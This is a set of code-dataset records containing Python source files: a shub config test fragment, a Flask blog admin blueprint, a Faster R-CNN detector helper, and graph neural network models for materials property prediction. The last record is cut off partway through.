key3: val3\n \"\"\")\n runner = CliRunner()\n with runner.isolated_filesystem():\n with open('conf.yml', 'w') as f:\n f.write(YAML_BEFORE)\n with update_yaml_dict('conf.yml') as conf:\n conf['a_second']['key1'] = 'newval1'\n conf['a_second']['key3'] = 'val3'\n with open('conf.yml', 'r') as f:\n self.assertEqual(f.read(), YAML_EXPECTED)\n\n @mock.patch('shub.config.load_shub_config')\n def test_get_target_version(self, mock_lsh):\n get_target('mytarget', auth_required=False)\n get_version()\n mock_lsh.return_value.get_target.assert_called_once_with(\n 'mytarget', auth_required=False)\n mock_lsh.return_value.get_version.assert_called_once_with()\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":17136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"109156110","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom flask import render_template, request, Response, json, redirect, url_for, Blueprint, flash\nfrom flask.ext.login import LoginManager, login_user, logout_user, current_user, login_required\nfrom newlife.model import Article, Label, Category, Comment, Media, Admin\nfrom newlife.config import UPLOAD_FOLDER, ALLOWED_EXTENSIONS\nfrom newlife.view import front\nfrom datetime import date, datetime\nfrom werkzeug import secure_filename\nimport newlife.config as myconfig\nimport math\nimport ast\nimport os\nimport time\n\nblueprint = Blueprint('admin', __name__, template_folder='templates')\n\n\ndef Pagination(dbcollection, pageSize=None, showSize=None, current=None):\n \"\"\"pageSize 每页显示多少个项目,showSize 分页导航中要显示多少个导航数字,\n show0 分页导航中最开始要从那个数字开始计算, pagenum 显示当前分页中有几个项目\"\"\"\n pages = (current - 1) * pageSize\n result = dbcollection.limit(pageSize).skip(pages)\n count = dbcollection.count()\n allpages = math.ceil(count / pageSize)\n # 当所要求显示的导航个数大于总分页数,就把显示导航个数等于总分页数\n if showSize > allpages:\n show0 = 1\n showSize = allpages\n Itemnum = pageSize if (count - (current - 1) * pageSize) > pageSize else (\n count - (current - 1) * pageSize)\n else:\n # middle 为分页时显示分页导航的第一个距离中间显示当前页的相差个数\n middle = math.floor(\n showSize / 2) if showSize % 2 else math.floor(showSize / 2)\n if current - middle <= 0:\n show0 = 1\n elif current - middle > 0 and current + middle <= allpages:\n show0 = current - middle\n elif current + middle > allpages:\n show0 = allpages - middle - 2\n if count < pageSize:\n Itemnum = count\n elif count > pageSize:\n Itemnum = pageSize if (count - (current - 1) * pageSize) > pageSize else (\n count - (current - 1) * pageSize)\n return {\"result\": result,\n \"Itemnum\": Itemnum,\n \"current\": current,\n \"allpages\": allpages,\n \"showNum\": showSize,\n \"show0\": show0\n }\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@blueprint.route('/admin')\n@login_required\ndef admin():\n mytime=time.time()\n return render_template('admin/admin.html',time=int(mytime))\n\n\n@blueprint.route('/admin_summary')\n@login_required\ndef summary():\n article = Article()\n monthes = [{'mon':x,'num':0} for x in range(1,13)]\n for month in monthes:\n show=[{'$project': {'month': {'$month': '$time'}}},{'$match': {'month': month['mon']}}]\n result = article.aggregate(show)['result']\n month['num']=len(result)\n # return str(monthes)\n return Response(json.dumps([mon['num'] for mon in monthes]), mimetype='application/json')\n\n\n@blueprint.route('/admin_main.html')\n@login_required\ndef admin_main():\n return render_template('admin/admin_main.html')\n\n\n@blueprint.route('/admin_article_add.html')\n@login_required\ndef admin_article_add():\n label = Label()\n labels = label.get()\n category = Category()\n categorys = category.get()\n return render_template('admin/admin_article_add.html', labels=labels, categorys=categorys)\n\n\n@blueprint.route('/admin_article_view.html')\n@login_required\ndef admin_article_view_direct():\n return admin_article_view(1)\n\n\n@blueprint.route('/admin_article_view.html/')\n@login_required\ndef admin_article_view(page):\n # page 为当前请求的分页\n article = Article()\n artlist = article.get()\n paging = Pagination(artlist, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_article_view.html', paging=paging)\n\n\n@blueprint.route('/admin_label.html')\n@login_required\ndef admin_label():\n label = Label()\n labels = label.get()\n count = labels.count()\n return render_template('admin/admin_label.html', labels=labels, count=count)\n\n\n@blueprint.route('/admin_category.html')\n@login_required\ndef admin_catogory():\n category = Category()\n categorys = category.get()\n count = categorys.count()\n return render_template('admin/admin_category.html', categorys=categorys, count=count)\n\n\n@blueprint.route('/admin_media_add.html')\n@login_required\ndef admin_media_add():\n return render_template('admin/admin_media_add.html')\n\n\n@blueprint.route('/upload', methods=['POST'])\n@login_required\ndef upload():\n if request.method == \"POST\":\n media = Media()\n files = request.files.getlist('files[]')\n try:\n for file in files:\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 判断是否已经存在文件\n if not media.ifrepeat(query={'name': filename}):\n upload = os.path.join(os.getcwd() + UPLOAD_FOLDER)\n if not os.path.exists(upload):\n os.makedirs(upload)\n path = os.path.join(\n os.getcwd() + UPLOAD_FOLDER, filename)\n file.save(path)\n filetype = file.mimetype.split('/')[1]\n time = datetime.now()\n media.insert(\n data={'name': filename, 'type': filetype, 'time': time})\n else:\n return \"该文件已存在\"\n else:\n return '文件格式不允许'\n return \"上传成功\"\n except Exception as e:\n return \"上传失败\"\n\n\n@blueprint.route('/remove_media/')\n@login_required\ndef remove_media(id):\n media = Media()\n filename = media.getOne({'id': id})['name']\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = media.remove({'id': id})\n # 从文件系统里删除文件\n try:\n os.remove(os.path.join(os.getcwd() + UPLOAD_FOLDER, filename))\n except Exception as e:\n return \"false\"\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n@blueprint.route('/admin_media_view.html')\n@login_required\ndef admin_media_redirect():\n return admin_media_view(1)\n\n@blueprint.route('/admin_media_view.html/')\n@login_required\ndef admin_media_view(page):\n media = Media()\n medias = media.get()\n paging = Pagination(medias, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_media_view.html', paging=paging)\n\n\n@blueprint.route('/admin_comment.html')\n@login_required\ndef admin_comment_redirect():\n return admin_comment(1)\n\n\n@blueprint.route('/admin_comment.html/')\n@login_required\ndef admin_comment(page):\n comment = Comment()\n comments = comment.get()\n paging = Pagination(comments, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_comment.html', paging=paging)\n\n\n@blueprint.route('/add_article', methods=['GET', 'POST'])\n@login_required\ndef add_article():\n title = request.form.get('title', '')\n content = request.form.get('content', '')\n recom = request.form.get('recommend', '')\n categorys = request.form.get('categorys', '').split(\n \":\") if request.form.get('categorys', '') else \"\"\n labels = request.form.get('labels', '').split(\n \":\") if request.form.get('labels', '') else \"\"\n time = datetime.now()\n article = Article()\n result = article.insert(\n {\"title\": title, \"content\": content, \"category\": categorys, \"label\": labels, \"time\": time, \"recommend\": recom, \"clicknum\": 0})\n if result == \"true\":\n # 更新category 和label的文章数\n category = Category()\n for ca in categorys:\n category.update(query={'name': ca}, inc={\"num\": 1})\n label = Label()\n for la in labels:\n label.update(query={'name': la}, inc={\"num\": 1})\n flash(\"文章添加成功\")\n else:\n flash(\"文章添加失败\")\n return render_template(\"admin/admin_article_add.html\")\n\n\n@blueprint.route('/add_label', methods=['GET', 'POST'])\n@login_required\ndef add_label():\n value = request.form.get('value', '')\n label = Label()\n result = label.insert({'name': value, 'num': 0})\n # return Response(json.dumps(result['n']), mimetype='application/json')\n return result\n\n\n@blueprint.route('/add_category', methods=['GET', 'POST'])\n@login_required\ndef add_category():\n value = request.form.get('value', '')\n category = Category()\n result = category.insert({'name': value, 'num': 0})\n # return Response(json.dumps(result['n']), mimetype='application/json')\n return result\n\n\n@blueprint.route('/remove_comment/', methods=['GET'])\n@login_required\ndef remove_comment(id):\n comment = Comment()\n result = comment.remove(query={'id': id})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_category/', methods=['GET'])\n@login_required\ndef remove_category(id):\n category = Category()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = category.remove({'id': id})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_article/', methods=['GET'])\n@login_required\ndef remove_article(id):\n article = Article()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n get = article.getOne(query={'id': id})\n result = article.remove({'id': id})\n if result['n']:\n # 更新category 和label的文章数\n if get['category']:\n category = Category()\n for ca in get['category']:\n category.update(query={'name': ca}, inc={\"num\": -1})\n if get['label']:\n label = Label()\n for la in get['label']:\n label.update(query={'name': la}, inc={\"num\": -1})\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_label/', methods=['GET'])\n@login_required\ndef remove_label(id):\n label = Label()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = label.remove({'id': id})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_batch_media', methods=['POST'])\n@blueprint.route('/remove_batch_comment', methods=['POST'])\n@blueprint.route('/remove_batch_label', methods=['POST'])\n@blueprint.route('/remove_batch_category', methods=['POST'])\n@blueprint.route('/remove_batch_article', methods=['POST'])\n@login_required\ndef remove_batch():\n if request.path == \"/remove_batch_article\":\n dofun = remove_article\n elif request.path == \"/remove_batch_category\":\n dofun = remove_category\n elif request.path == \"/remove_batch_label\":\n dofun = remove_label\n elif request.path == \"/remove_batch_comment\":\n dofun = remove_comment\n elif request.path == \"/remove_batch_media\":\n dofun = remove_media\n else:\n pass\n\n ids = request.form.get('ids', '')\n ids = ids.split(\",\")\n result = []\n for id in ids:\n resu = dofun(int(id))\n if resu == \"true\":\n result.append(True)\n else:\n result.append(False)\n if False in result:\n return \"false\"\n else:\n return \"true\"\n\n\n@blueprint.route('/admin_article_modify/')\n@login_required\ndef admin_article_modify(id):\n article = Article()\n result = article.getOne(query={\"id\": id})\n label = Label()\n labels = label.get()\n category = Category()\n categorys = category.get()\n return render_template(\"admin/admin_article_modify.html\", article=result, labels=labels, categorys=categorys)\n\n\n@blueprint.route('/modify_article', methods=['GET', 'POST'])\n@login_required\ndef modify_article():\n article = Article()\n id = int(request.form.get('id', ''))\n content = request.form.get('content', '')\n title = request.form.get('title', '')\n recom = request.form.get('recommend', '')\n categorys = request.form.get('categorys', '').split(\n \":\") if request.form.get('categorys', '') else \"\"\n labels = request.form.get('labels', '').split(\n \":\") if request.form.get('labels', '') else \"\"\n result = article.update(query={\"id\": id}, data={\n \"title\": title, \"content\": content, \"category\": categorys, \"label\": labels, \"recommend\": recom})\n if result['n']:\n return \"文章修改成功\"\n else:\n return \"文章修改失败\"\n\n\n@blueprint.route('/modify_category/', methods=['GET', 'POST'])\n@login_required\ndef modify_category(id):\n value = request.form.get('value', '')\n category = Category()\n result = category.update(query={'id': id}, data={'name': value})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/modify_label/', methods=['GET', 'POST'])\n@login_required\ndef modify_label(id):\n value = request.form.get('value', '')\n label = Label()\n result = label.update(query={'id': id}, data={'name': value})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/admin_editor_upload.html')\n@login_required\ndef admin_editor_upload():\n media = Media()\n medias = media.get()\n return render_template('admin/admin_editor_upload.html', medias=medias)\n\n\n@blueprint.route('/login')\ndef login():\n if current_user.is_authenticated():\n return \"你已经登录了\"\n else:\n return render_template(\"admin/login.html\")\n\n\n@blueprint.route('/logincheck', methods=['POST'])\ndef logincheck():\n username = request.form.get('username', '')\n passwd = request.form.get('passwd', '')\n admin = Admin()\n admin.get_user(username, passwd)\n login_user(admin)\n auth = admin.is_authenticated()\n if auth:\n return \"ok\"\n else:\n return \"no\"\n # if result:\n # return \"ok\"\n # else:\n # return \"no\"\n\n\n@blueprint.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('front.index'))\n\n\n@blueprint.route(\"/admin_config.html\",methods=['GET','POST'])\n@login_required\ndef config():\n if request.method=='GET':\n return render_template(\"admin/admin_config.html\",config=myconfig)\n else:\n try:\n notstr=['CSRF_ENABLED','DBPORT','ALLOWED_EXTENSIONS','MAX_CONTENT_LENGTH']\n file = os.path.join(os.getcwd() + \"/newlife/config.py\")\n filehandle=open(file,'w+',encoding=\"utf-8\")\n for key,value in request.form.items():\n if key not in notstr:\n value=\"'\"+value+\"'\"\n if key=='MAX_CONTENT_LENGTH':\n value = value +'*1024*1024'\n filehandle.write(key+' = '+value+\"\\n\")\n filehandle.close()\n return 'ok'\n except Exception as e:\n return 'no'\n\n\n","sub_path":"newlife/view/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238274044","text":"import sys\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .caffe_path import caffe\nfrom .timer import Timer\n\n__all__ = ['Detector']\n\n# VOC Class list\nCLASSES = dict(\n voc = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car',\n 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'),\n coco = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train',\n 'truck', 'boat', 'traffic light', 'fire hydrant', 'stop sign',\n 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',\n 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella',\n 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard',\n 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork',\n 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange',\n 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair',\n 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',\n 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush')\n)\n\nclass Detector(object):\n \"\"\"Faster R-CNN Detector\"\"\"\n def __init__(self, prototxt, caffemodel, gpu_id, dataset='coco',\n scale=600, max_size=1000, transpose=(2, 0, 1),\n mean=[102.9801, 115.9465, 122.7717]):\n if gpu_id < 0:\n caffe.set_mode_cpu()\n else:\n caffe.set_mode_gpu()\n caffe.set_device(gpu_id)\n self.net = caffe.Net(prototxt, caffe.TEST, weights=caffemodel)\n print('[{name}] Loaded network {model}'.format(\n name=self.__class__.__name__, model=caffemodel))\n\n self.scale = scale\n self.max_size = max_size\n self.transpose = transpose\n self.mean = np.array(mean, dtype=np.float32)[None,None,:]\n self.classes = CLASSES[dataset]\n\n # colormap for visualization\n self.colormap = []\n for i in range(len(self.classes)):\n self.colormap.append(plt.get_cmap('hsv')(i / len(self.classes)))\n\n def preprocess(self, im):\n im = im.astype(np.float32) - self.mean\n short_size, long_size = sorted(im.shape[:2])\n factor = min(self.scale/short_size, self.max_size/long_size)\n im = cv2.resize(im, None, None, fx=factor, fy=factor)\n im = im.transpose(self.transpose)\n info = np.array((im.shape[1], im.shape[2], factor), dtype=np.float32)\n return im, info, factor\n\n def detect(self, im):\n im, info, factor = self.preprocess(im)\n self.net.blobs['data'].reshape(1, *(im.shape))\n self.net.blobs['data'].data[0,...] = im\n self.net.blobs['im_info'].data[...] = info\n dets = self.net.forward()['rcnn_out']\n if dets.ndim != 2:\n return np.empty((0,6), dtype=np.float32)\n else:\n return dets\n\n def demo(self, image):\n im = cv2.imread(image)\n timer = Timer()\n timer.tic()\n dets = self.detect(im)\n timer.toc()\n print ('Detection took {:.3f}s for {:d} objects'.format(timer.total_time, len(dets)))\n return self.plot(im, dets)\n \n def plot(self, im, dets, thresh=0, ax=None, linewidth=2.5):\n # create image axes\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n im = im[:, :, (2, 1, 0)] # to rgb\n ax.imshow(im.astype(np.uint8))\n if len(dets) == 0:\n return ax\n\n print(dets.shape)\n for det in dets:\n score = det[1]\n if score < thresh:\n continue\n class_id = int(det[0])\n x, y = det[2:4]\n w, h = det[4:6] - det[2:4]\n rect = plt.Rectangle((x, y), w, h, fill=False, edgecolor=self.colormap[class_id], linewidth=linewidth)\n ax.add_patch(rect)\n ax.text(x, y-2, '{:s} {:.3f}'.format(self.classes[class_id], score),\n bbox=dict(facecolor=self.colormap[class_id], alpha=0.5), fontsize=12, color='white')\n return ax","sub_path":"contrib/faster_rcnn/tutorial/utils/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"493587926","text":"import torch\nimport torch_geometric\nimport torch.nn.functional as F\nfrom torch import Tensor\nfrom torch.nn import Sequential, Linear, ReLU, GRU, Embedding, BatchNorm1d\nfrom torch_geometric.nn import (\n NNConv,\n Set2Set,\n CGConv,\n global_mean_pool,\n global_add_pool,\n global_max_pool,\n SchNet,\n BatchNorm,\n GraphConv,\n MessagePassing,\n MetaLayer,\n GCNConv,\n)\nfrom torch_geometric.data import DataLoader, Dataset, Data\nfrom torch_geometric.utils import remove_self_loops, dense_to_sparse, degree\nfrom torch_scatter import scatter_mean, scatter_add, scatter_max, scatter\nfrom torch_geometric.nn.models.schnet import InteractionBlock\n\n################################################################################\n# ML Models\n################################################################################\n\n# Models included here:\n# CGCNN, MPNN, SchNet, MEGNet, GCN, Standard NN using SM and SOAP\n\n# Simple GCN\nclass GCN_net(torch.nn.Module):\n def __init__(self, data, dim1, dim2, conv_count, fc_count, pool, **kwargs):\n super(GCN_net, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList(\n [\n GCNConv(dim1, dim1, improved=True, add_self_loops=False)\n for i in range(conv_count)\n ]\n )\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n for layer in self.conv_list:\n out = F.relu(layer(out, data.edge_index, data.edge_weight))\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# MPNN\nclass MPNN(torch.nn.Module):\n def __init__(self, data, dim1, dim2, dim3, conv_count, fc_count, pool, **kwargs):\n super(MPNN, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList()\n self.gru_list = torch.nn.ModuleList()\n for i in range(conv_count):\n nn = Sequential(\n Linear(data.num_edge_features, dim3), ReLU(), Linear(dim3, dim1 * dim1)\n )\n conv = NNConv(dim1, dim1, nn, aggr=\"mean\")\n gru = GRU(dim1, dim1)\n self.conv_list.append(conv)\n gru = GRU(dim1, dim1)\n self.gru_list.append(gru)\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n out = F.relu(self.lin0(data.x))\n h = out.unsqueeze(0)\n for i in range(len(self.conv_list)):\n m = F.relu(self.conv_list[i](out, data.edge_index, data.edge_attr))\n out, h = self.gru_list[i](m.unsqueeze(0), h)\n out = out.squeeze(0)\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Schnet\nclass SchNet(SchNet):\n def __init__(\n self, data, dim1, dim2, dim3, conv_count, fc_count, pool, cutoff=8, **kwargs\n ):\n super(SchNet, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n\n self.interactions = torch.nn.ModuleList()\n for _ in range(conv_count):\n block = InteractionBlock(dim1, data.num_edge_features, dim2, cutoff)\n self.interactions.append(block)\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim3)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim3)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim3, dim3) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim3, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n\n for interaction in self.interactions:\n out = out + interaction(\n out, data.edge_index, data.edge_weight, data.edge_attr\n )\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n\n return out.view(-1)\n\n\n# CGCNN\nclass CGCNN(torch.nn.Module):\n def __init__(self, data, dim1, dim2, conv_count, fc_count, pool, **kwargs):\n super(CGCNN, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList(\n [\n CGConv(dim1, data.num_edge_features, aggr=\"mean\", batch_norm=True)\n for i in range(conv_count)\n ]\n )\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n for layer in self.conv_list:\n out = F.relu(layer(out, data.edge_index, data.edge_attr))\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Megnet\nclass Megnet_EdgeModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_EdgeModel, self).__init__()\n self.edge_mlp_1 = Sequential(Linear(dim * 4, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, src, dest, edge_attr, u, batch):\n comb = torch.cat([src, dest, edge_attr, u[batch]], dim=1)\n out = self.edge_mlp_1(comb)\n return out\n\n\nclass Megnet_NodeModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_NodeModel, self).__init__()\n self.node_mlp_1 = Sequential(Linear(dim * 3, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, x, edge_index, edge_attr, u, batch):\n # row, col = edge_index\n v_e = scatter_mean(edge_attr, edge_index[0, :], dim=0)\n comb = torch.cat([x, v_e, u[batch]], dim=1)\n out = self.node_mlp_1(comb)\n return out\n\n\nclass Megnet_GlobalModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_GlobalModel, self).__init__()\n self.global_mlp_1 = Sequential(Linear(dim * 3, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, x, edge_index, edge_attr, u, batch):\n u_e = scatter_mean(edge_attr, edge_index[0, :], dim=0)\n u_e = scatter_mean(u_e, batch, dim=0)\n u_v = scatter_mean(x, batch, dim=0)\n comb = torch.cat([u_e, u_v, u], dim=1)\n out = self.global_mlp_1(comb)\n return out\n\n\nclass MEGNet(torch.nn.Module):\n def __init__(self, data, dim1, dim2, dim3, conv_count, fc_count, pool, **kwargs):\n super(MEGNet, self).__init__()\n self.lin0 = torch.nn.Linear(data.num_node_features, dim1)\n self.pool = pool\n megnet_block = MetaLayer(\n Megnet_EdgeModel(dim2), Megnet_NodeModel(dim2), Megnet_GlobalModel(dim2)\n )\n self.e_embed_list = torch.nn.ModuleList()\n self.x_embed_list = torch.nn.ModuleList()\n self.u_embed_list = torch.nn.ModuleList()\n self.meg_list = torch.nn.ModuleList()\n\n for i in range(0, conv_count):\n if i == 0:\n meg = megnet_block\n e_embed = Sequential(\n Linear(data.num_edge_features, dim1), ReLU(), Linear(dim1, dim2)\n )\n x_embed = Sequential(Linear(dim1, dim1), ReLU(), Linear(dim1, dim2))\n u_embed = Sequential(\n Linear((data[0].u.shape[1]), dim1), ReLU(), Linear(dim1, dim2)\n )\n self.e_embed_list.append(e_embed)\n self.x_embed_list.append(x_embed)\n self.u_embed_list.append(u_embed)\n self.meg_list.append(meg)\n elif i > 0:\n meg = megnet_block\n e_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n x_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n u_embed = Sequential(Linear(dim2, dim1), ReLU(), Linear(dim1, dim2))\n self.e_embed_list.append(e_embed)\n self.x_embed_list.append(x_embed)\n self.u_embed_list.append(u_embed)\n self.meg_list.append(meg)\n\n if self.pool == \"set2set\":\n self.set2set_x = Set2Set(dim2, processing_steps=3)\n self.set2set_e = Set2Set(dim2, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim2 * 5, dim3)\n\n else:\n self.lin1 = torch.nn.Linear(dim2 * 3, dim3)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim3, dim3) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim3, 1)\n\n def forward(self, data):\n\n x = F.relu(self.lin0(data.x))\n\n for i in range(0, len(self.meg_list)):\n\n if i == 0:\n e_temp = self.e_embed_list[i](data.edge_attr)\n x_temp = self.x_embed_list[i](x)\n u_temp = self.u_embed_list[i](data.u)\n x_out, e_out, u_out = self.meg_list[i](\n x_temp, data.edge_index, e_temp, u_temp, data.batch\n )\n x = torch.add(x_out, x_temp)\n e = torch.add(e_out, e_temp)\n u = torch.add(u_out, u_temp)\n\n elif i > 0:\n e_temp = self.e_embed_list[i](e)\n x_temp = self.x_embed_list[i](x)\n u_temp = self.u_embed_list[i](u)\n x_out, e_out, u_out = self.meg_list[i](\n x_temp, data.edge_index, e_temp, u_temp, data.batch\n )\n x = torch.add(x_out, x)\n e = torch.add(e_out, e)\n u = torch.add(u_out, u)\n\n if self.pool == \"set2set\":\n x_pool = self.set2set_x(x, data.batch)\n # not exactly same as original, extra scatter operation to go from edge to node index\n e = scatter(e, data.edge_index[0, :], dim=0, reduce=\"mean\")\n e_pool = self.set2set_e(e, data.batch)\n comb_pool = torch.cat([x_pool, e_pool, u], dim=1)\n\n else:\n x_pool = scatter(x, data.batch, dim=0, reduce=self.pool)\n e_pool = scatter(e, data.edge_index[0, :], dim=0, reduce=self.pool)\n e_pool = scatter(e_pool, data.batch, dim=0, reduce=self.pool)\n comb_pool = torch.cat([x_pool, e_pool, u], dim=1)\n\n out = F.relu(self.lin1(comb_pool))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n\n return out.view(-1)\n\n\n# Sine matrix with neural network\nclass SM(torch.nn.Module):\n def __init__(self, data, dim1, fc_count, **kwargs):\n super(SM, self).__init__()\n\n self.lin1 = torch.nn.Linear(data[0].extra_features_SM.shape[1], dim1)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim1, dim1) for i in range(fc_count)]\n )\n\n self.lin2 = torch.nn.Linear(dim1, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin1(data.extra_features_SM))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Smooth Overlap of Atomic Positions with neural network\nclass SOAP(torch.nn.Module):\n def __init__(self, data, dim1, fc_count, **kwargs):\n super(SOAP, self).__init__()\n\n self.lin1 = torch.nn.Linear(data[0].extra_features_SOAP.shape[1], dim1)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim1, dim1) for i in range(fc_count)]\n )\n\n self.lin2 = torch.nn.Linear(dim1, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin1(data.extra_features_SOAP))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Prints model summary\ndef model_summary(model):\n model_params_list = list(model.named_parameters())\n print(\"--------------------------------------------------------------------------\")\n line_new = \"{:>30} {:>20} {:>20}\".format(\n \"Layer.Parameter\", \"Param Tensor Shape\", \"Param #\"\n )\n print(line_new)\n print(\"--------------------------------------------------------------------------\")\n for elem in model_params_list:\n p_name = elem[0]\n p_shape = list(elem[1].size())\n p_count = torch.tensor(elem[1].size()).prod().item()\n line_new = \"{:>30} {:>20} {:>20}\".format(p_name, str(p_shape), str(p_count))\n print(line_new)\n print(\"--------------------------------------------------------------------------\")\n total_params = sum([param.nelement() for param in model.parameters()])\n print(\"Total params:\", total_params)\n num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Trainable 